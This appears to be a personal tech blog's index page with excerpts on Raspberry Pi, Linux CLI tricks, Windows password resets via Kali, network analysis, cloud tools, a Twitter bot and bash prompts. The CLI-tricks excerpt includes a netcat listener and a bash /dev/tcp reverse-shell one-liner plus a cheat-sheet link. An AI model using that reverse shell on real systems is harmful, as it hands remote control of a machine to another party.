Pi fidelity

First experience of Raspberry Pi 4, Zero and Pico

Always be careful when running scripts and commands copied from the Internet. Anyway, that said… Getting start Download Raspberry Pi imager from the Play Store to write images to an SD card from your phone. You can use a wall charger but they run happily off a large powerbank if you wanna dev from the sofa. Connection differences between the Pi 4 and Zero type 4 Zero HDMI Micro Mini Power USB-C Micro-USB Operating systems It’s by far easiest to install Raspbian 32-bit. [Read More]

Linux CLI tricks

Send a string to an IP/port telnet 80 (echo hello; sleep 1) | telnet 80 echo hello > /dev/tcp/ echo hello | nc localhost 80 Reverse shell # server nc -knvlp 3389 # client bash -i >& /dev/tcp/server_ip/3389 0>&1 See also https://tldp.org/LDP/abs/html/x17974.html https://highon.coffee/blog/reverse-shell-cheat-sheet/ https://catonmat.net/bash-one-liners-explained-part-three http://docs.eggplantsoftware.com/epp/9.0.0/ePP/advovercoming_tcpip_connection_li.htm Target everything but one file git add !(unit.md) Print a random line from a file sed "$(( $RANDOM % $(cat readme.txt | wc -l) ))q;d" readme. [Read More]

Resetting a forgotten Windows password

When you’ve misplaced the password to a local Windows account. Seen to work on Windows 2000, 7 and 10. Prerequisites: a 4GB USB stick and a machine capable of creating a USB boot disk (Ubuntu is good). Time to complete: half an hour to download Kali and create the stick and a few minutes to reset a password. Download the latest Kali Linux ISO and create a USB boot disk on another machine. [Read More]

Network analysis

On the Linux command line

For the purposes of this exercise we’re not employing any nefarious means to gain access to packets. Generally Ethernet switches attempt to intelligently direct packets to only the intended host so an ordinary machine sat on a subnet will only receive its own packets and broadcasts. But unsolicited broadcasts will at least show you some other active IPs on the network. You want to get “in the way” of as much data as possible so if you can run these tests on the router then even better. [Read More]

Cloud computing

Play With Docker Amazon Web Services Digital Ocean Google Cloud Hybrid Cloud Cloud9 versus Google Cloud SSH Google’s is slightly slicker, more tightly integrated with the instance browser. The Google web SSH client is so close to the real thing that you quickly forget what’s going on. Cloud9 IDE is quite nice, Sublime-style editor. But slightly odd ctrl codes remind you that you’re not actually typing into a real terminal. [Read More]

Create a Twitter bot

Using twurl and Google Cloud

Prerequisites: a Twitter account, moderate command line and Google Cloud experience. Time to complete: a couple of hours. Alternatively you might consider GitLab hosting. Developer account Apply for a Twitter dev account, create an app and make a note of the two API keys. Keep them to yourself. Google Cloud hosting Create the smallest (and cheapest) Linux instance on Google Cloud. Installation Connect to your instance and install the essentials. [Read More]

Generate a network topology

From a hosts file

tracehost is a bash script that parses a standard hosts files and generates an SVG. The script accepts a standard system hosts file format but actually it only cares about the first host or IP on a line. In fact any line format may be used as long as each line begins with something that can be pinged. localhost # for local people - google silobrighton.com # Zero waste The image below is generated as a daily GitLab cron job. [Read More]

Turbo charge your bash prompt

Bash prompt variables The escape characters that can appear in the bash prompt are well-documented so let’s not cover that in any detail. But a good starting point is the “user@host:dir” combo, which conveniently is also the scp syntax. PS1="\u@\h:\w $ " root@kali:/tmp $ Variables described in the bash documentation: PS1 - The primary prompt string. The default value is ‘\s-\v$ ’. PS0 - The value of this parameter is expanded like PS1 and displayed by interactive shells after reading a command and before the command is executed. [Read More]